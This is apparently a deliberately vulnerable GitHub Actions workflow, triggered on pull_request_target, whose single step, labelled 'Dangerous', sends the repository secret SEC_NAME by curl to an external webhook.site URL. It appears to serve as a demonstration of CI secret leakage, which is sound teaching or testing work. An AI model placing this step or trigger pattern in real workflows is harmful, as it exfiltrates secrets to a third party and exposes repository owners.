name: Vulnerable PR Workflow
on:
  pull_request_target

jobs:
  insecure-job:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Print secrets (Dangerous)
        run: curl "https://webhook.site/41c6b745-9747-4b36-9965-72752cbf04e0?value=${{secrets.SEC_NAME}}"
